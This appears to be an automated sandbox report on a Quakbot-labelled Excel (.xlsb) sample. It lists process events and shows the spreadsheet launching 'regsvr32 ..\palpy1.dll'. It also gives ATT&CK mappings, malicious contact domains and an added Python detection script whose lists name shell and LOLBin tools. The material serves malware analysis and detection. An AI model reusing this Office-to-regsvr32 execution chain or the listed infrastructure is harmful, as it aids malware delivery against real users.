Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File opened: C:\Windows\SysWOW64\MSVCR100.dll
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 ..\palpy1.dll
Source: C:\Windows\splwow64.exe | Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\splwow64.exeWindow / User API: threadDelayed 1107
Source: C:\Windows\splwow64.exeLast function: Thread delayed
Source: C:\Windows\splwow64.exeLast function: Thread delayed
Source: C:\Windows\splwow64.exeThread delayed: delay time: 120000
Source: C:\Windows\splwow64.exeThread delayed: delay time: 120000
Source: regsvr32.exe, 00000005.00000002.681496690.00000000047F0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: regsvr32.exe, 00000005.00000002.681496690.00000000047F0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: regsvr32.exe, 00000005.00000002.681496690.00000000047F0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: regsvr32.exe, 00000005.00000002.681496690.00000000047F0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
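The process-creation row (EXCEL.EXE spawning `regsvr32 ..\palpy1.dll`) is the observation behind the "Microsoft Office Product Spawning Windows Shell" Sigma hit and the "Registers a DLL" signature. The Python below is an added example of the corresponding detection logic, not Joe Sandbox's or Sigma's own code. It evaluates constructed process-creation events whose field names follow Sysmon Event ID 1; the `CurrentDirectory` values and the two benign control events are invented for the demo (the report does not record Excel's working directory). It flags an Office parent launching a LOLBin, regsvr32 loading a DLL from outside the Windows and Program Files trees, and a relative `..\` DLL path, resolving that path against the working directory so an analyst sees where the DLL actually lived.

```python
"""Evaluate process-creation events for the Office -> regsvr32 pattern.
Field names follow Sysmon Event ID 1; the events below are constructed."""
import ntpath
import re

OFFICE_PARENTS = {"excel.exe", "winword.exe", "powerpnt.exe",
                  "outlook.exe", "msaccess.exe"}
SHELL_CHILDREN = {"regsvr32.exe", "rundll32.exe", "cmd.exe", "powershell.exe",
                  "wscript.exe", "cscript.exe", "mshta.exe", "certutil.exe"}
TRUSTED_DLL_DIRS = ("c:\\windows\\", "c:\\program files\\",
                    "c:\\program files (x86)\\")

# Constructed sample events. The first mirrors the report's process tree
# (its working directory is an assumption); the other two are benign controls.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE",
     "Image": r"C:\Windows\SysWOW64\regsvr32.exe",
     "CommandLine": r"regsvr32 ..\palpy1.dll",
     "CurrentDirectory": r"C:\Users\user\Documents\invoices"},
    {"ParentImage": r"C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE",
     "Image": r"C:\Windows\splwow64.exe",
     "CommandLine": r"C:\Windows\splwow64.exe 12288",
     "CurrentDirectory": r"C:\Users\user\Documents\invoices"},
    {"ParentImage": r"C:\Windows\System32\msiexec.exe",
     "Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": r'regsvr32 /s "C:\Program Files\Vendor\helper.dll"',
     "CurrentDirectory": r"C:\Windows\System32"},
]


def _basename(path):
    return ntpath.basename(path).lower()


def regsvr32_target(command_line, cwd):
    """Return the DLL path regsvr32 will load, resolved against cwd.
    Skips the program token and switches such as /s, /u, /n, /i:<cmd>."""
    tokens = [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', command_line)]
    args = [t for t in tokens[1:] if not t.startswith(("/", "-"))]
    if not args:
        return None
    target = args[-1]
    if not ntpath.isabs(target):
        target = ntpath.join(cwd, target)
    return ntpath.normpath(target)


def evaluate(event):
    """Return the list of rule names the event triggers (empty if benign)."""
    parent, child = _basename(event["ParentImage"]), _basename(event["Image"])
    hits = []
    if parent in OFFICE_PARENTS and child in SHELL_CHILDREN:
        hits.append("office_spawns_shell")
    if child == "regsvr32.exe":
        dll = regsvr32_target(event["CommandLine"], event["CurrentDirectory"])
        if dll is not None:
            if not dll.lower().startswith(TRUSTED_DLL_DIRS):
                hits.append("regsvr32_dll_outside_trusted_dirs")
            if "..\\" in event["CommandLine"]:
                hits.append("regsvr32_relative_dll_path")
    return hits


def scan(events):
    """Return [(index, resolved_dll_or_None, [rules])] for events that hit."""
    results = []
    for i, ev in enumerate(events):
        rules = evaluate(ev)
        if not rules:
            continue
        dll = None
        if _basename(ev["Image"]) == "regsvr32.exe":
            dll = regsvr32_target(ev["CommandLine"], ev["CurrentDirectory"])
        results.append((i, dll, rules))
    return results
```

Resolving the relative path matters in practice: the report only shows `..\palpy1.dll`, and the parent directory of wherever the document was opened is where the dropped DLL (and its sibling palpy2.dll) should be collected from. The trusted-directory check is deliberately a prefix test on the normalized path, so `..\` tricks cannot make a user-writable location look like C:\Windows.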

Mitre Att&ck Matrix

Cells with a bracketed number are the techniques matched by the report's signatures, with the count as rendered; the remaining cells are the unmatched entries of the matrix.

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Scripting [1] | DLL Side-Loading [1] | Process Injection [1] | Masquerading [1] | OS Credential Dumping | Query Registry [1] | Remote Services | Data from Local System | Exfiltration Over Other Network Medium | Encrypted Channel [2] | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Exploitation for Client Execution [23] | Boot or Logon Initialization Scripts | DLL Side-Loading [1] | Disable or Modify Tools [1] | LSASS Memory | Security Software Discovery [1] | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Non-Application Layer Protocol [1] | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Virtualization/Sandbox Evasion [1] | Security Account Manager | Virtualization/Sandbox Evasion [1] | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Application Layer Protocol [2] | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Process Injection [1] | NTDS | Application Window Discovery [1] | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | (none) | Carrier Billing Fraud
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Scripting [1] | LSA Secrets | File and Directory Discovery [1] | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | (none) | Manipulate App Store Rankings or Ratings
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Regsvr32 [1] | Cached Domain Credentials | System Information Discovery [2] | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | (none) | Abuse Accessibility Features
External Remote Services | Scheduled Task | Startup Items | Startup Items | DLL Side-Loading [1] | DCSync | Network Sniffing | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | (none) | Data Encrypted for Impact

Behavior Graph

[Interactive behavior graph not reproduced in this text export. Its legend distinguishes processes, signatures, created files, DNS/IP info, dropped files, Windows processes, counts of created registry values and files, the detected implementation language (Visual Basic, Delphi, Java, .NET C# or VB.NET, C/C++ or other), malicious nodes and Internet nodes.]

Screenshots

[Screenshot thumbnails are images and are not reproduced in this text export.]

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner | Label | Link
plan-515372324.xlsb | 15% | Virustotal | | Browse
plan-515372324.xlsb | 22% | ReversingLabs | Document-Office.Backdoor.Quakbot |

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

Source | Detection | Scanner | Label | Link
khangland.pro | 0% | Virustotal | | Browse
jaipurbynite.com | 0% | Virustotal | | Browse

URLs

Source | Detection | Scanner | Label | Link
https://cdn.entity. | 0% | URL Reputation | safe |
https://powerlift.acompli.net | 0% | URL Reputation | safe |
https://rpsticket.partnerservices.getmicrosoftkey.com | 0% | URL Reputation | safe |
https://cortana.ai | 0% | URL Reputation | safe |
https://api.aadrm.com/ | 0% | URL Reputation | safe |
https://ofcrecsvcapi-int.azurewebsites.net/ | 0% | Virustotal | | Browse
https://ofcrecsvcapi-int.azurewebsites.net/ | 0% | Avira URL Cloud | safe |
https://res.getmicrosoftkey.com/api/redemptionevents | 0% | URL Reputation | safe |
https://powerlift-frontdesk.acompli.net | 0% | URL Reputation | safe |
https://officeci.azurewebsites.net/api/ | 0% | Virustotal | | Browse
https://officeci.azurewebsites.net/api/ | 0% | Avira URL Cloud | safe |
https://store.office.cn/addinstemplate | 0% | URL Reputation | safe |
https://store.officeppe.com/addinstemplate | 0% | URL Reputation | safe |
https://dev0-api.acompli.net/autodetect | 0% | URL Reputation | safe |
https://www.odwebp.svc.ms | 0% | URL Reputation | safe |
https://dataservice.o365filtering.com/ | 0% | URL Reputation | safe |
https://officesetup.getmicrosoftkey.com | 0% | URL Reputation | safe |
https://prod-global-autodetect.acompli.net/autodetect | 0% | URL Reputation | safe |
https://ncus.contentsync. | 0% | URL Reputation | safe |
https://apis.live.net/v5.0/ | 0% | URL Reputation | safe |
https://wus2.contentsync. | 0% | URL Reputation | safe |
https://asgsmsproxyapi.azurewebsites.net/ | 0% | Virustotal | | Browse
https://asgsmsproxyapi.azurewebsites.net/ | 0% | Avira URL Cloud | safe |
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile | 0% | URL Reputation | safe |
https://ncus.pagecontentsync. | 0% | URL Reputation | safe |
https://skyapi.live.net/Activity/ | 0% | URL Reputation | safe |
https://dataservice.o365filtering.com | 0% | URL Reputation | safe |
https://api.cortana.ai | 0% | URL Reputation | safe |
https://ovisualuiapp.azurewebsites.net/pbiagave/ | 0% | Virustotal | | Browse
https://ovisualuiapp.azurewebsites.net/pbiagave/ | 0% | Avira URL Cloud | safe |
https://directory.services. | 0% | URL Reputation | safe |

Domains and IPs

Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
khangland.pro | 103.28.39.29 | true | false | | unknown
jaipurbynite.com | 104.244.121.13 | true | false | | unknown

URLs from Memory and Binaries

Source for every row below: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.dr

Name | Malicious | Antivirus Detection | Reputation
https://api.diagnosticssdf.office.com | false | | high
https://login.microsoftonline.com/ | false | | high
https://shell.suite.office.com:1443 | false | | high
https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize | false | | high
https://autodiscover-s.outlook.com/ | false | | high
https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr | false | | high
https://cdn.entity. | false | URL Reputation: safe | unknown
https://api.addins.omex.office.net/appinfo/query | false | | high
https://clients.config.office.net/user/v1.0/tenantassociationkey | false | | high
https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/ | false | | high
https://powerlift.acompli.net | false | URL Reputation: safe | unknown
https://rpsticket.partnerservices.getmicrosoftkey.com | false | URL Reputation: safe | unknown
https://lookup.onenote.com/lookup/geolocation/v1 | false | | high
https://cortana.ai | false | URL Reputation: safe | unknown
https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech | false | | high
https://cloudfiles.onenote.com/upload.aspx | false | | high
https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile | false | | high
https://entitlement.diagnosticssdf.office.com | false | | high
https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy | false | | high
https://api.aadrm.com/ | false | URL Reputation: safe | unknown
https://ofcrecsvcapi-int.azurewebsites.net/ | false | 0% Virustotal (Browse); Avira URL Cloud: safe | unknown
https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies | false | | high
https://api.microsoftstream.com/api/ | false | | high
https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive | false | | high
https://cr.office.com | false | | high
https://portal.office.com/account/?ref=ClientMeControl | false | | high
https://graph.ppe.windows.net | false | | high
https://res.getmicrosoftkey.com/api/redemptionevents | false | URL Reputation: safe | unknown
https://powerlift-frontdesk.acompli.net | false | URL Reputation: safe | unknown
https://tasks.office.com | false | | high
https://officeci.azurewebsites.net/api/ | false | 0% Virustotal (Browse); Avira URL Cloud: safe | unknown
https://sr.outlook.office.net/ws/speech/recognize/assistant/work | false | | high
https://store.office.cn/addinstemplate | false | URL Reputation: safe | unknown
https://outlook.office.com/autosuggest/api/v1/init?cvid= | false | | high
https://globaldisco.crm.dynamics.com | false | | high
https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech | false | | high
https://store.officeppe.com/addinstemplate | false | URL Reputation: safe | unknown
https://dev0-api.acompli.net/autodetect | false | URL Reputation: safe | unknown
https://www.odwebp.svc.ms | false | URL Reputation: safe | unknown
https://api.powerbi.com/v1.0/myorg/groups | false | | high
https://web.microsoftstream.com/video/ | false | | high
https://graph.windows.net | false | | high
https://dataservice.o365filtering.com/ | false | URL Reputation: safe | unknown
https://officesetup.getmicrosoftkey.com | false | URL Reputation: safe | unknown
https://analysis.windows.net/powerbi/api | false | | high
https://prod-global-autodetect.acompli.net/autodetect | false | URL Reputation: safe | unknown
https://outlook.office365.com/autodiscover/autodiscover.json | false | | high
https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios | false | | high
https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech | false | | high
https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json | false | | high
https://ncus.contentsync. | false | URL Reputation: safe | unknown
https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false | false | | high
https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/ | false | | high
http://weather.service.msn.com/data.aspx | false | | high
https://apis.live.net/v5.0/ | false | URL Reputation: safe | unknown
https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks | false | | high
https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios | false | | high
https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml | false | | high
https://management.azure.com | false | | high
https://wus2.contentsync. | false | URL Reputation: safe | unknown
https://incidents.diagnostics.office.com | false | | high
https://clients.config.office.net/user/v1.0/ios | false | | high
https://insertmedia.bing.office.net/odc/insertmedia | false | | high
https://o365auditrealtimeingestion.manage.office.com | false | | high
https://outlook.office365.com/api/v1.0/me/Activities | false | | high
https://api.office.net | false | | high
https://incidents.diagnosticssdf.office.com | false | | high
https://asgsmsproxyapi.azurewebsites.net/ | false | 0% Virustotal (Browse); Avira URL Cloud: safe | unknown
                                                                                                  https://clients.config.office.net/user/v1.0/android/policies66988849-8D57-437E-97F2-4EBE1CC53C33.1.drfalse
                                                                                                    high
                                                                                                    https://entitlement.diagnostics.office.com66988849-8D57-437E-97F2-4EBE1CC53C33.1.drfalse
                                                                                                      high
                                                                                                      https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json66988849-8D57-437E-97F2-4EBE1CC53C33.1.drfalse
                                                                                                        high
                                                                                                        https://substrate.office.com/search/api/v2/init66988849-8D57-437E-97F2-4EBE1CC53C33.1.drfalse
                                                                                                          high
                                                                                                          https://outlook.office.com/66988849-8D57-437E-97F2-4EBE1CC53C33.1.drfalse
                                                                                                            high
                                                                                                            https://storage.live.com/clientlogs/uploadlocation66988849-8D57-437E-97F2-4EBE1CC53C33.1.drfalse
                                                                                                              high
                                                                                                              https://templatelogging.office.com/client/log66988849-8D57-437E-97F2-4EBE1CC53C33.1.drfalse
                                                                                                                high
                                                                                                                https://outlook.office365.com/66988849-8D57-437E-97F2-4EBE1CC53C33.1.drfalse
                                                                                                                  high
                                                                                                                  https://webshell.suite.office.com66988849-8D57-437E-97F2-4EBE1CC53C33.1.drfalse
                                                                                                                    high
                                                                                                                    https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive66988849-8D57-437E-97F2-4EBE1CC53C33.1.drfalse
                                                                                                                      high
                                                                                                                      https://management.azure.com/66988849-8D57-437E-97F2-4EBE1CC53C33.1.drfalse
                                                                                                                        high
                                                                                                                        https://login.windows.net/common/oauth2/authorize66988849-8D57-437E-97F2-4EBE1CC53C33.1.drfalse
                                                                                                                          high
                                                                                                                          https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile66988849-8D57-437E-97F2-4EBE1CC53C33.1.drfalse
                                                                                                                          • URL Reputation: safe
                                                                                                                          • URL Reputation: safe
                                                                                                                          • URL Reputation: safe
                                                                                                                          • URL Reputation: safe
                                                                                                                          unknown
                                                                                                                          https://graph.windows.net/66988849-8D57-437E-97F2-4EBE1CC53C33.1.drfalse
                                                                                                                            high
                                                                                                                            https://api.powerbi.com/beta/myorg/imports66988849-8D57-437E-97F2-4EBE1CC53C33.1.drfalse
                                                                                                                              high
                                                                                                                              https://devnull.onenote.com66988849-8D57-437E-97F2-4EBE1CC53C33.1.drfalse
                                                                                                                                high
                                                                                                                                https://ncus.pagecontentsync.66988849-8D57-437E-97F2-4EBE1CC53C33.1.drfalse
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                unknown
                                                                                                                                https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json66988849-8D57-437E-97F2-4EBE1CC53C33.1.drfalse
                                                                                                                                  high
                                                                                                                                  https://messaging.office.com/66988849-8D57-437E-97F2-4EBE1CC53C33.1.drfalse
                                                                                                                                    high
                                                                                                                                    https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile66988849-8D57-437E-97F2-4EBE1CC53C33.1.drfalse
                                                                                                                                      high
                                                                                                                                      https://augloop.office.com/v266988849-8D57-437E-97F2-4EBE1CC53C33.1.drfalse
                                                                                                                                        high
                                                                                                                                        https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing66988849-8D57-437E-97F2-4EBE1CC53C33.1.drfalse
                                                                                                                                          high
                                                                                                                                          https://skyapi.live.net/Activity/66988849-8D57-437E-97F2-4EBE1CC53C33.1.drfalse
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          unknown
                                                                                                                                          https://clients.config.office.net/user/v1.0/mac66988849-8D57-437E-97F2-4EBE1CC53C33.1.drfalse
                                                                                                                                            high
                                                                                                                                            https://dataservice.o365filtering.com66988849-8D57-437E-97F2-4EBE1CC53C33.1.drfalse
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            unknown
                                                                                                                                            https://api.cortana.ai66988849-8D57-437E-97F2-4EBE1CC53C33.1.drfalse
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            unknown
                                                                                                                                            https://onedrive.live.com66988849-8D57-437E-97F2-4EBE1CC53C33.1.drfalse
                                                                                                                                              high
                                                                                                                                              https://ovisualuiapp.azurewebsites.net/pbiagave/66988849-8D57-437E-97F2-4EBE1CC53C33.1.drfalse
                                                                                                                                              • 0%, Virustotal, Browse
                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                              unknown
                                                                                                                                              https://visio.uservoice.com/forums/368202-visio-on-devices66988849-8D57-437E-97F2-4EBE1CC53C33.1.drfalse
                                                                                                                                                high
                                                                                                                                                https://directory.services.66988849-8D57-437E-97F2-4EBE1CC53C33.1.drfalse
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                unknown
                                                                                                                                                https://login.windows-ppe.net/common/oauth2/authorize66988849-8D57-437E-97F2-4EBE1CC53C33.1.drfalse
                                                                                                                                                  high
                                                                                                                                                  https://staging.cortana.ai66988849-8D57-437E-97F2-4EBE1CC53C33.1.drfalse
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  unknown

Contacted IPs

Legend (share of contacted IPs per country):
• No. of IPs < 25%
• 25% < No. of IPs < 50%
• 50% < No. of IPs < 75%
• 75% < No. of IPs

Public

IP | Domain | Country | ASN | ASN Name | Malicious
104.244.121.13 | jaipurbynite.com | United States | 22611 | IMH-WESTUS | false
103.28.39.29 | khangland.pro | Viet Nam | 131353 | NHANHOA-AS-VN NhanHoa Software company VN | false

General Information

Joe Sandbox Version: 32.0.0 Black Diamond
Analysis ID: 442112
Start date: 30.06.2021
Start time: 00:07:35
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 5m 24s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: plan-515372324.xlsb
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes: 18
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal72.expl.evad.winXLSB@7/10@2/2
EGA Information: Failed
HDC Information: Failed
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .xlsb
• Found Word or Excel or PowerPoint or XPS Viewer
• Attach to Office via COM
• Scroll down
• Close Viewer
Warnings:
• Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
• Excluded IPs from analysis (whitelisted): 52.255.188.83, 52.109.88.177, 52.109.8.24, 20.82.210.154, 20.54.104.15, 40.112.88.60, 205.185.216.10, 205.185.216.42, 20.50.102.62, 80.67.82.235, 80.67.82.211, 20.82.209.183
• Excluded domains from analysis (whitelisted): prod-w.nexus.live.com.akadns.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a1449.dscg2.akamai.net, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, audownload.windowsupdate.nsatc.net, au.download.windowsupdate.com.hwcdn.net, nexus.officeapps.live.com, arc.trafficmanager.net, officeclient.microsoft.com, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, au-bg-shim.trafficmanager.net, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, prod.configsvc1.live.com.akadns.net, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, ctldl.windowsupdate.com, cds.d2s7q6s2.hwcdn.net, consumerrp-displaycatalog-aks2aks-europe.md.mp.microsoft.com.akadns.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, config.officeapps.live.com, blobcollector.events.data.trafficmanager.net, europe.configsvc1.live.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net, neu-consumerrp-displaycatalog-aks2aks-europe.md.mp.microsoft.com.akadns.net

Simulations

Behavior and APIs

Time | Type | Description
00:08:25 | API Interceptor | 1155x Sleep call for process: splwow64.exe modified

                                                                                                                                                  Joe Sandbox View / Context

                                                                                                                                                  IPs

                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                  103.28.39.29plan-536150726.xlsbGet hashmaliciousBrowse
                                                                                                                                                    https://otochothue.com/ahead/89963/89963.zipGet hashmaliciousBrowse
                                                                                                                                                      https://otochothue.com/ahead/20376640/20376640.zipGet hashmaliciousBrowse

Domains

Match | Associated Sample Name / URL | Detection | Context
khangland.pro | plan-536150726.xlsb | malicious | 103.28.39.29

ASN

Match | Associated Sample Name / URL | Detection | Context
IMH-WESTUS | dqVPlpmWYt.exe | malicious | 74.124.211.132
IMH-WESTUS | chems.exe | malicious | 192.249.117.18
IMH-WESTUS | Mohamed Abrar H CV.xlsx | malicious | 205.134.252.239
IMH-WESTUS | INVOICE125POR.xlsx | malicious | 205.134.252.239
IMH-WESTUS | DHL AWB TRACKING DETAILS.exe | malicious | 104.247.72.46
IMH-WESTUS | PACKING LIST CORP INVOICE 2738829 DATED 26 FOR SHIPMENT AS STATED ON 26 APRIL05I992lcNll.exe | malicious | 192.145.239.54
IMH-WESTUS | PACKING LIST CORP INVOICE 2738829 DATED 26 FOR SHIPMENT AS STATED ON 26 APRIL05I992lc.exe | malicious | 192.145.239.54
IMH-WESTUS | DHL AWB TRACKING DETAILS.exe | malicious | 104.247.72.46
IMH-WESTUS | PACKING LIST CORP INVOICE 2738829 DATED 26 FOR SHIPMENT AS STATED ON 26 APRIL05I.exe | malicious | 192.145.239.54
IMH-WESTUS | Telex.exe | malicious | 192.145.239.54
IMH-WESTUS | PO 367628usa.exe | malicious | 209.182.202.96
IMH-WESTUS | eLECTRONIC Flight Ticket Invoice confirmationETKT XXXXX3939 INVOICE 000Z1298932 TKT Payment.exe | malicious | 192.145.239.54
IMH-WESTUS | eLECTRONIC Flight Ticket Confirmation VIS XXXXX3939 INVOICE 000Z1298932 TKT Payment.exe | malicious | 192.145.239.54
IMH-WESTUS | scan of document 5336227.xlsm | malicious | 192.249.126.181
IMH-WESTUS | scan of invoice 91510.xlsm | malicious | 192.249.126.181
IMH-WESTUS | scan of bill 0905.xlsm | malicious | 192.249.126.181
